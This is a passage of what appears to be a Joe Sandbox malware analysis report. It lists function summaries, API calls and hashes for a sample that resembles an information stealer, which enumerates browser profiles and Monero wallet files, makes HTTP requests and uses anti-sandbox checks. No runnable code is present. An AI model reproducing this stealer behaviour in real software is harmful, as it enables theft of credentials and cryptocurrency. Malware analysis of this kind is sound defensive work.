                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                • String ID: @
                                • API String ID: 3404098578-2766056989
                                • Opcode ID: 84c129129f96ca70b58e68ebe25f3115299c7ef09a1844545f6e8eded6c3b661
                                • Instruction ID: e809631bca154c5b5e6eeb54bf729fd39a86b9704a6984342ba78b6250920583
                                • Opcode Fuzzy Hash: 84c129129f96ca70b58e68ebe25f3115299c7ef09a1844545f6e8eded6c3b661
                                • Instruction Fuzzy Hash: E0016DB0D4030CFAEB10EBE0DC4ABAEBB78BB44701F208089E705B62D0D7785541879D
                                Function 00506AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1450 506af3 1451 506b0a 1450->1451 1453 506aba-506ad7 call 50aad0 OpenEventA 1451->1453 1454 506b0c-506b22 call 506920 call 505b10 CloseHandle ExitProcess 1451->1454 1459 506af5-506b04 CloseHandle Sleep 1453->1459 1460 506ad9-506af1 call 50aad0 CreateEventA 1453->1460 1459->1451 1460->1454
                                APIs
                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,012D89D0,?,0051110C,?,00000000,?,00511110,?,00000000,00510AEF), ref: 00506ACA
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00506AE8
                                • CloseHandle.KERNEL32(00000000), ref: 00506AF9
                                • Sleep.KERNEL32(00001770), ref: 00506B04
                                • CloseHandle.KERNEL32(?,00000000,?,012D89D0,?,0051110C,?,00000000,?,00511110,?,00000000,00510AEF), ref: 00506B1A
                                • ExitProcess.KERNEL32 ref: 00506B22
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                • String ID:
                                • API String ID: 941982115-0
                                • Opcode ID: 4d58ffee3fe1c3e7f126d292f4c632a6731e63b6ce96c40ceed5b5eae3ffa718
                                • Instruction ID: e2916f1069415f7480376c5c44dfd07d318b6152d184546436cb40feb76be120
                                • Opcode Fuzzy Hash: 4d58ffee3fe1c3e7f126d292f4c632a6731e63b6ce96c40ceed5b5eae3ffa718
                                • Instruction Fuzzy Hash: 59F03470A4020AEAF700ABA09C0BBBE7E34FB04702F108914B503A11D1DBB45540DAAA
                                Function 004F47B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004F4839
                                • InternetCrackUrlA.WININET(00000000,00000000), ref: 004F4849
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CrackInternetlstrlen
                                • String ID: <
                                • API String ID: 1274457161-4251816714
                                • Opcode ID: f93c1a0c2aaeafb29a29855b18071a849b6eff811b187f6edd233a9cc912e9b4
                                • Instruction ID: aa0bf04278d5a7955b8e4ffd79a32601aa7d2d8b352fdfef0503187b7b3045f3
                                • Opcode Fuzzy Hash: f93c1a0c2aaeafb29a29855b18071a849b6eff811b187f6edd233a9cc912e9b4
                                • Instruction Fuzzy Hash: B2213EB1D00209ABDF14DFA5EC4AADE7B74FB44320F108625F955A72D1EB706A09CB91
                                Function 005051F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 0050A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0050A7E6
                                  • Part of subcall function 004F6280: InternetOpenA.WININET(00510DFE,00000001,00000000,00000000,00000000), ref: 004F62E1
                                  • Part of subcall function 004F6280: StrCmpCA.SHLWAPI(?,012DE250), ref: 004F6303
                                  • Part of subcall function 004F6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004F6335
                                  • Part of subcall function 004F6280: HttpOpenRequestA.WININET(00000000,GET,?,012DDC38,00000000,00000000,00400100,00000000), ref: 004F6385
                                  • Part of subcall function 004F6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004F63BF
                                  • Part of subcall function 004F6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004F63D1
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00505228
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                • String ID: ERROR$ERROR
                                • API String ID: 3287882509-2579291623
                                • Opcode ID: 829063a38f6a3848b91cc6ed10dc7005532df1d4034b5c915f4f3dc6591f9806
                                • Instruction ID: 28d0dd082fb96949026ace9d7d076ccf913e77d0db286a5252dd52a32ebb777d
                                • Opcode Fuzzy Hash: 829063a38f6a3848b91cc6ed10dc7005532df1d4034b5c915f4f3dc6591f9806
                                • Instruction Fuzzy Hash: 31112E30900249ABDB14FF70DD5AEED7B38BF90300F408558F90A4A1D2EF34AB09CA95
                                Function 005078E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00507910
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00507917
                                • GetComputerNameA.KERNEL32(?,00000104), ref: 0050792F
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateComputerNameProcess
                                • String ID:
                                • API String ID: 1664310425-0
                                • Opcode ID: 69b3a9561e2222d9cdbcb58911bf5c86a4e5328e1026a635a4087bddd3df72fc
                                • Instruction ID: 12c8a68c293b157a6b8ecf6c7754a84d766e196c6d41b3334d5f959497b773b7
                                • Opcode Fuzzy Hash: 69b3a9561e2222d9cdbcb58911bf5c86a4e5328e1026a635a4087bddd3df72fc
                                • Instruction Fuzzy Hash: A30186B1904208EBDB00DF98DD45BAEBFB8FB04B21F104619F945E32C0C37859048BA5
                                Function 004F1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 004F112B
                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 004F1132
                                • ExitProcess.KERNEL32 ref: 004F1143
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$AllocCurrentExitNumaVirtual
                                • String ID:
                                • API String ID: 1103761159-0
                                • Opcode ID: d523352d7063a808f6b159639b9557dfea7013bb49330a79673e3c08426fec0e
                                • Instruction ID: 8a8f86659e2988b36491f663ea650cb5fa4d3bde1c7620b88e79519c8c348cb3
                                • Opcode Fuzzy Hash: d523352d7063a808f6b159639b9557dfea7013bb49330a79673e3c08426fec0e
                                • Instruction Fuzzy Hash: 6AE0E67094534CFFF7106BA1DD0FB5976B8AB04B06F104055F709765D0D6B92640969E
                                Function 004F10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 004F10B3
                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 004F10F7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$AllocFree
                                • String ID:
                                • API String ID: 2087232378-0
                                • Opcode ID: 99aaf11bcbaee74b7d35cafa34d7148dbb3c06573ff6c104f4c1aa503d3ad835
                                • Instruction ID: 0845f81a4345e43988eb574b95654d618ab7d9c4dfeab86c12cde628f049be40
                                • Opcode Fuzzy Hash: 99aaf11bcbaee74b7d35cafa34d7148dbb3c06573ff6c104f4c1aa503d3ad835
                                • Instruction Fuzzy Hash: 10F0E271641208BBE7149AA8AC4AFBFB7E8E705B15F304848F644E3290D9759E00CAA8
                                Function 004F1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 005078E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00507910
                                  • Part of subcall function 005078E0: RtlAllocateHeap.NTDLL(00000000), ref: 00507917
                                  • Part of subcall function 005078E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0050792F
                                  • Part of subcall function 00507850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004F11B7), ref: 00507880
                                  • Part of subcall function 00507850: RtlAllocateHeap.NTDLL(00000000), ref: 00507887
                                  • Part of subcall function 00507850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0050789F
                                • ExitProcess.KERNEL32 ref: 004F11C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Process$AllocateName$ComputerExitUser
                                • String ID:
                                • API String ID: 3550813701-0
                                • Opcode ID: 05ea10f8852d8ba502a0e54dd223e57937f7f202664bd78661c07945f74cda38
                                • Instruction ID: cfc47c290a32e07ec84c3556944305ff141c33c9539b792bb08ea3a91bfb957c
                                • Opcode Fuzzy Hash: 05ea10f8852d8ba502a0e54dd223e57937f7f202664bd78661c07945f74cda38
                                • Instruction Fuzzy Hash: 2CE0ECA5A1420AA2DA1077B0AD0FB3E3A9C6B58346F044425BA4592692FA29F810856E

                                Non-executed Functions

                                Function 005038B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 005038CC
                                • FindFirstFileA.KERNEL32(?,?), ref: 005038E3
                                • lstrcat.KERNEL32(?,?), ref: 00503935
                                • StrCmpCA.SHLWAPI(?,00510F70), ref: 00503947
                                • StrCmpCA.SHLWAPI(?,00510F74), ref: 0050395D
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00503C67
                                • FindClose.KERNEL32(000000FF), ref: 00503C7C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                • API String ID: 1125553467-2524465048
                                • Opcode ID: 11afeeecea4bfc99156dfa10e3111d417d182b4e339349a9ea4a0e3312724df1
                                • Instruction ID: 9ce3dc138ad4449ecd33148eae2f0fd9c075ddab1278d92a2b53013f054119f8
                                • Opcode Fuzzy Hash: 11afeeecea4bfc99156dfa10e3111d417d182b4e339349a9ea4a0e3312724df1
                                • Instruction Fuzzy Hash: 3AA143B1A00209ABDB24DF64DC8AFFE777CBF44301F048588A54D96181EB759B84CF52
                                Function 004FBE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                  • Part of subcall function 0050A920: lstrcpy.KERNEL32(00000000,?), ref: 0050A972
                                  • Part of subcall function 0050A920: lstrcat.KERNEL32(00000000), ref: 0050A982
                                  • Part of subcall function 0050A9B0: lstrlen.KERNEL32(?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 0050A9C5
                                  • Part of subcall function 0050A9B0: lstrcpy.KERNEL32(00000000), ref: 0050AA04
                                  • Part of subcall function 0050A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0050AA12
                                  • Part of subcall function 0050A8A0: lstrcpy.KERNEL32(?,00510E17), ref: 0050A905
                                • FindFirstFileA.KERNEL32(00000000,?,00510B32,00510B2B,00000000,?,?,?,005113F4,00510B2A), ref: 004FBEF5
                                • StrCmpCA.SHLWAPI(?,005113F8), ref: 004FBF4D
                                • StrCmpCA.SHLWAPI(?,005113FC), ref: 004FBF63
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 004FC7BF
                                • FindClose.KERNEL32(000000FF), ref: 004FC7D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                • API String ID: 3334442632-726946144
                                • Opcode ID: 55e8b20e3d21527764d504388fe8240b4d93da4880d18614fa24a436d616276a
                                • Instruction ID: a7de55e3f96f895bdc079da2c87678376fb9cb1cc397c4e742ea438fd2240f56
                                • Opcode Fuzzy Hash: 55e8b20e3d21527764d504388fe8240b4d93da4880d18614fa24a436d616276a
                                • Instruction Fuzzy Hash: 37427472910209ABDB14FB70DD9AEEE777CBFD4300F408558B906961C1EE34AB49CB96
                                Function 00504910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 0050492C
                                • FindFirstFileA.KERNEL32(?,?), ref: 00504943
                                • StrCmpCA.SHLWAPI(?,00510FDC), ref: 00504971
                                • StrCmpCA.SHLWAPI(?,00510FE0), ref: 00504987
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00504B7D
                                • FindClose.KERNEL32(000000FF), ref: 00504B92
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
